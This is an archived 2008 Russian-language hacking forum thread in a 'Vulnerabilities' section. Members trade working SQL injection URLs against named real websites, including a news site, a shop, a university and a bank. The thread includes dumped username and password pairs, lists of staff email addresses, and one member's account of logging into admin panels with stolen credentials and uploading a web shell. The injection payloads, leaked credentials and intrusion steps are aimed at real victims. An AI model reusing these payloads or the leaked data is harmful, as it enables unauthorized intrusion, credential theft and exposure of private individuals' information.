ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #6851  
Старый 13.11.2008, 23:56
DREASTY
Познающий
Регистрация: 19.11.2007
Сообщений: 81
Провел на форуме:
509730

Репутация: 52
Отправить сообщение для DREASTY с помощью ICQ
По умолчанию

http://www.tid.odessa.ua/news/?newsid=-1 UNION SELECT 1,2,3,4,5

немогу дальше подобрать
 

  #6852  
Старый 14.11.2008, 00:23
pento
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137

Репутация: 66
По умолчанию

Цитата:
Сообщение от DREASTY  
http://www.tid.odessa.ua/news/?newsid=-1 UNION SELECT 1,2,3,4,5

немогу дальше подобрать
google://information_schema
И вперед...

Последний раз редактировалось pento; 14.11.2008 в 00:37..
 

Shop
  #6853  
Старый 14.11.2008, 01:04
FNS
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме:
51589

Репутация: 55
Отправить сообщение для FNS с помощью ICQ
По умолчанию Shop

Код:
http://www.ultraproducts.com/st_content.php?id=-1+union+select+1,2,concat(user_name,0x3a,password)+from+users--
Код:
http://www.ultraproducts.com/admin/
 

  #6854  
Старый 14.11.2008, 01:52
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Цитата:
Сообщение от DREASTY  
http://www.tid.odessa.ua/news/?newsid=-1 UNION SELECT 1,2,3,4,5

немогу дальше подобрать
Код:
http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+table_name,2,3,4,5+from+information_schema.tables+limit+1,1--
И перебирай таблицы,пока не найдеш нужную тебе колонку....когда найдеш почитай тут
 

  #6855  
Старый 14.11.2008, 02:53
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

PR5
http://www.uwsn.org/sup.php?id=-99999+union+select+1,2,3,4,unhex(hex(version())),6/*

version:4.1.13-standard-log
 

  #6856  
Старый 14.11.2008, 04:56
DREASTY
Познающий
Регистрация: 19.11.2007
Сообщений: 81
Провел на форуме:
509730

Репутация: 52
Отправить сообщение для DREASTY с помощью ICQ
По умолчанию

Цитата:
Сообщение от -m0rgan-  
Код:
http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+table_name,2,3,4,5+from+information_schema.tables+limit+1,1--
И перебирай таблицы,пока не найдеш нужную тебе колонку....когда найдеш почитай тут
Спасибо m0rgan !!

newtid@localhost
5.0.32-Debian_7etch8-log

http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+login,password,3,4,5+from+managers+ limit+1,1%20--

admin:shokhov
price:123456
isisis:123456
vale:valevale
irina:123
towka:123456
boris:123
margarita:123456
kuzoff:54214

админку так и не нашел!
 

  #6857  
Старый 14.11.2008, 16:57
procedure
Banned
Регистрация: 22.12.2007
Сообщений: 660
Провел на форуме:
3885269

Репутация: 1158


Post

Акционерный коммерческий банк «Интеграл» (сокращенно АКБ «Интеграл-банк») – это универсальное банковское учреждение, предоставляющее полный комплекс услуг на внутреннем и внешнем финансовых рынках.
url: http://fxintegral.com/
target: http://fxintegral.com/beginer/ справа email подписка RSS
using: в имени вводим -999999' email: любой
Description: 4 поля. Вывод не приходит на email. Запрос -999' не обрабатывается, при нажатии отправить выводит SQL Syntax и.т.д. Запрос union+select+user(),user(),user(),user()/* проходит успешно. Вывод запроса опять же не приходит на email. Не показывается на странице.На сайте доступны различные банковские операции.
 

  #6858  
Старый 15.11.2008, 01:15
dArKkNiGHt
Новичок
Регистрация: 18.08.2008
Сообщений: 8
Провел на форуме:
56704

Репутация: 5
Unhappy

Цитата:
Сообщение от DREASTY  
Спасибо m0rgan !!

newtid@localhost
5.0.32-Debian_7etch8-log

http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+login,password,3,4,5+from+managers+ limit+1,1%20--

admin:shokhov
price:123456
isisis:123456
vale:valevale
irina:123
towka:123456
boris:123
margarita:123456
kuzoff:54214

админку так и не нашел!
а толку то? совсем ничего не даёт, ну узнал пользователей, пароли, а применить некуда.
всю базу можно раскрутить а сделать ничего более.
file_priv закрыт, ни шэлл, ни другие пакости не проходят
 

  #6859  
Старый 15.11.2008, 08:56
jjokker
Новичок
Регистрация: 19.04.2008
Сообщений: 6
Провел на форуме:
28766

Репутация: 34
Отправить сообщение для jjokker с помощью ICQ
По умолчанию

Цитата:
Сообщение от dArKkNiGHt  
а толку то? совсем ничего не даёт, ну узнал пользователей, пароли, а применить некуда.
всю базу можно раскрутить а сделать ничего более.
file_priv закрыт, ни шэлл, ни другие пакости не проходят

Эээ... Уважаемый , а что вы вообще хотите ??? Как то давно я поднимал тему на irc по поводу целесообразности и вообще надобности взломов
Мало кто мог адекватно ответить для чего он ломает тот или иной ресурс. Сегодня за ночь пересмотрел почти всю эту ветку и тут помоему просто все учатся.
Человеку показали как сделать определенное движение) Он его сделал и сказал спасибо! Я считаю это резальт который нужен.

Спустя 20 мин)

Уважаемый, Хакер это не тот человек который знает скул и как ее крутит, хакер этот тот кто думает головой. Перед тем как или во время поиска скули надо обращать внимание на все... надо собирать информацию об атакуемом сервере и понимать в конечном итоге что тебе надо от него , если только БД , то наш уважаемый -DREASTY- , толко что показал что данные очень элементарно экспортируются из БД администратора в наш Notepad++ это уже в своем роде пакость (а для кого то возможно и деньги), так что на ваш вопрос по поводу того "а толку то?" лично я ответил.
Идем далее, с чего вы делаете такие поспешные выводы относителньо того что дальше ничего не сделать? Подколоть старательного ученика в том что он плохо научился пользоваться MySQL 5.+? Или это просто ваши выводы из ходя из того что Вы ничего не смогли сделать???
Итак(после быстрого моего анализа):
_http://www.tid.odessa.ua/phpinfo.php
_http://www.tid.odessa.ua/adserv/www/admin/
(пароль и логин подходят)
это чисто управление пользователями,кликами,бан нерами,БД,ПО,обновлением ддвига... после 10 минутнорго мучения заливки шелла через баннер shell.php.gif при том что там менял настройки хранения банера не в БД и не стороннем сервере а именно в каталоге сайта ... прав на исполнение все равно не было... поэтому шелл как был залит так и удален. болше ничего пробовать не сстал, поскольку понимал что где должно быть управление контентом сайта...
Так оно и есть _http://www.tid.odessa.ua/siteadmin/
(логин пароль опять же подходят)
там сразу есть заливка файлов прям первая первая страничка ... тыдынс _http://www.tid.odessa.ua/files/achat.php , поскольку не люблю функционал этого шелла сразу через еще и другой шелл. Более того права на сервере не велики , но на чтение практически все. более того можем вылезти из корней директории выше на другие сайты ... 2ip показал что их 3 , но в реале их там больше!

Вывод: Уважаемый не делайте поспешных выводов!!!

Прошу простить Администрацию и Модератора за типа оффтоп... ну просто правда выбесил пассажир =((

Последний раз редактировалось jjokker; 15.11.2008 в 10:09..
 

  #6860  
Старый 15.11.2008, 13:48
jjokker
Новичок
Регистрация: 19.04.2008
Сообщений: 6
Провел на форуме:
28766

Репутация: 34
Отправить сообщение для jjokker с помощью ICQ
По умолчанию

Цитата:
Сообщение от [sql]  
пр 8 тиц 700
Код:
http://www.kcl.ac.uk/news/events_details.php?year=2008&event_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--
не чего не выводит, но есть другая
Код:
http://www.kcl.ac.uk/news/news_details.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25--&year=2008
к сожелению мало чем помогло)

еду пр 5
Код:
http://www.mfhs.edu/news/news_display.asp?artID=-1+or+1=@@version--
_http://www.kcl.ac.uk/news/news_details.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,email ,15,16,17,18,19,20,21,22,23,24,25+from+users--&year=2008

4.1.22-standard-log::webteam_newsdev::newsdev@localhost

Next:
waqar.alam@kcl.ac.uk
christopher.saward@kcl.ac.uk
julie.munk@kcl.ac.uk
susan.farrell@kcl.ac.uk
peter.graham@kcl.ac.uk
alex.bevis@kcl.ac.uk
kate.moore@kcl.ac.uk
kate.saunders@kcl.ac.uk
liz.newell@kcl.ac.uk
melanie.gardner@kcl.ac.uk
webnews@kcl.ac.uk
kate.thomas@kcl.ac.uk

префиксов нет ни перед таблицами ни в колонках.

поэтому твоя фраза "к сожелению мало чем помогло)", черезчур поспешна ... кто ищет тот всегда найдет ...

Последний раз редактировалось jjokker; 15.11.2008 в 14:20..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ